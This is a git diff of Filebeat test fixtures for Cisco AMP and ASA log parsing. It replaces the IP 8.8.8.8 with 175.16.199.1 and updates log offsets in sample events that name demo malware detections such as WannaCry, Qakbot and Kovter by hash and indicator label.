@@ -1792,7 +1792,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 37836,
+        "log.offset": 37986,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1801,7 +1801,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1813,7 +1813,7 @@
         "@timestamp": "2021-01-14T11:26:37.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1851,7 +1851,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 39029,
+        "log.offset": 39184,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1860,7 +1860,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1876,7 +1876,7 @@
         "@timestamp": "2021-01-14T11:26:37.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1908,7 +1908,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 40302,
+        "log.offset": 40462,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1917,7 +1917,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1929,7 +1929,7 @@
         "@timestamp": "2021-01-14T11:26:37.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1961,7 +1961,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 41422,
+        "log.offset": 41587,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1970,7 +1970,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1982,7 +1982,7 @@
         "@timestamp": "2021-01-14T11:26:36.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2020,7 +2020,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 42542,
+        "log.offset": 42712,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2029,7 +2029,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2045,7 +2045,7 @@
         "@timestamp": "2021-01-14T11:26:36.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2085,7 +2085,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 43815,
+        "log.offset": 43990,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -2096,7 +2096,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2112,7 +2112,7 @@
         "@timestamp": "2021-01-14T11:26:36.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2144,7 +2144,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 45179,
+        "log.offset": 45359,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2153,7 +2153,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2165,7 +2165,7 @@
         "@timestamp": "2021-01-14T11:26:35.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2205,7 +2205,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 46299,
+        "log.offset": 46484,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -2216,7 +2216,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2232,7 +2232,7 @@
         "@timestamp": "2021-01-14T11:26:35.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2272,7 +2272,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 47663,
+        "log.offset": 47853,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -2283,7 +2283,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2299,7 +2299,7 @@
         "@timestamp": "2021-01-14T11:26:35.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2339,7 +2339,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 49034,
+        "log.offset": 49229,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -2350,7 +2350,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2366,7 +2366,7 @@
         "@timestamp": "2021-01-14T11:26:35.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2407,7 +2407,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 50398,
+        "log.offset": 50598,
         "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4",
         "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
         "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
@@ -2423,7 +2423,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2439,7 +2439,7 @@
         "@timestamp": "2021-01-14T10:59:33.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2478,7 +2478,7 @@
         "host.hostname": "Demo_AMP_MAP_FriedEx",
         "host.name": "Demo_AMP_MAP_FriedEx",
         "input.type": "log",
-        "log.offset": 52012,
+        "log.offset": 52217,
         "process.hash.md5": "71c85477df9347fe8e7bc55768473fca",
         "process.hash.sha1": "ff658a36899e43fec3966d608b4aa4472de7a378",
         "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536",
@@ -2494,7 +2494,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2512,7 +2512,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2547,7 +2547,7 @@
         "host.hostname": "Demo_AMP_MAP_FriedEx",
         "host.name": "Demo_AMP_MAP_FriedEx",
         "input.type": "log",
-        "log.offset": 53662,
+        "log.offset": 53872,
         "process.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0",
         "related.hash": [
             "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"
@@ -2557,7 +2557,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2571,7 +2571,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2606,7 +2606,7 @@
         "host.hostname": "Demo_AMP_MAP_FriedEx",
         "host.name": "Demo_AMP_MAP_FriedEx",
         "input.type": "log",
-        "log.offset": 55441,
+        "log.offset": 55656,
         "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536",
         "related.hash": [
             "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"
@@ -2616,7 +2616,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2630,7 +2630,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2665,7 +2665,7 @@
         "host.hostname": "Demo_Command_Line_Arguments_Kovter",
         "host.name": "Demo_Command_Line_Arguments_Kovter",
         "input.type": "log",
-        "log.offset": 57151,
+        "log.offset": 57371,
         "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff",
         "related.hash": [
             "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"
@@ -2675,7 +2675,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2689,7 +2689,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2724,7 +2724,7 @@
         "host.hostname": "Demo_Command_Line_Arguments_Kovter",
         "host.name": "Demo_Command_Line_Arguments_Kovter",
         "input.type": "log",
-        "log.offset": 58928,
+        "log.offset": 59153,
         "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff",
         "related.hash": [
             "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"
@@ -2734,7 +2734,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2746,7 +2746,7 @@
         "@timestamp": "2021-01-14T10:33:46.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2780,7 +2780,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 60601,
+        "log.offset": 60831,
         "related.hash": [
             "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
         ],
@@ -2789,7 +2789,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2801,7 +2801,7 @@
         "@timestamp": "2021-01-14T10:33:46.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2833,7 +2833,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 61802,
+        "log.offset": 62037,
         "related.hash": [
             "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
         ],
@@ -2842,7 +2842,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log
index 75271900c573..42ffa8a85d77 100644
--- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log
+++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log
@@ -1,38 +1,38 @@
-May  5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)
-May  5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)
-May  5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3
+May  5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (175.16.199.1/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)
+May  5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (175.16.199.1/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)
+May  5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 3
 May  5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00
 May  5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2
-May  5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1
-May  5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111)
+May  5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 1
+May  5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (175.16.199.1/111) to fw111:192.168.2.2/111 (8.8.5.4/111)
 May  5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443)
 May  5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67
 May  5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log
 May  5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4
-May  5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872.
-May  5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0
+May  5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 175.16.199.1/10872.
+May  5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 175.16.199.1/2 laddr 10.10.10.10/2 type 8 code 0
 May  5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10
 May  5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00
-May  5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0
-May  5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3
+May  5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 10.192.46.90/0
+May  5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 3
 May  5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I
-May  5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839)
+May  5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (175.16.199.1/80) to net:10.10.10.10/54839 (175.16.199.1/54839)
 May  5 18:29:32 dev01: %ASA-6-305012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00
 May  5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session
 May  5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006
 May  5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN  on interface out111
 May  5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:192.186.2.2/53356 duration 0:02:04 bytes 64585
-May  5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)
-May  5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)
+May  5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (175.16.199.1/22638)
+May  5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (175.16.199.1/22638)
 May  5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group "out1111_access_out" [0x47e21ef4, 0x47e21ef4]
 May  5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111
 May  5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111
 May  5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK  on interface out111
 May  5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK  on interface out111
 May  5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST  on interface fw111
-May  5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)
-May  5 19:02:58 dev01: %ASA-6-302022: Built forwarder  stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)
-May  5 19:02:58 dev01: %ASA-6-302022: Built backup  stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)
+May  5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (175.16.199.1/10051)
+May  5 19:02:58 dev01: %ASA-6-302022: Built forwarder  stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (175.16.199.1/10051)
+May  5 19:02:58 dev01: %ASA-6-302022: Built backup  stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (175.16.199.1/10051)
 May  5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner
 May  5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow
 May  5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief
@@ -40,10 +40,10 @@ May  5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list
 May  5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -> fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000]
 May  5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -> fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000]
 May  5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner
-May  5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8)
+May  5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (175.16.199.1)
 May  5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985
 May  5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout
-May  5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123)
+May  5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (175.16.199.1/123)
 May  5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0)
 May  5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063
 May  5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2
@@ -52,7 +52,7 @@ Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http:
 Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0]
 Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23
 Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/
-Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout
+Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.143/54242 to server.deflan:67.43.156.12/9101 duration 1:00:02 bytes 245 Connection timeout
 Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group "global_access_1"
 Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -> OUTSIDE/195.122.12.242(53) hit-cnt 1 first hit [0x16847359, 0x00000000]
 Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK
@@ -62,31 +62,31 @@ Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD
 Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin
 Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user "admin"
 Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin
-Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d
-Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested
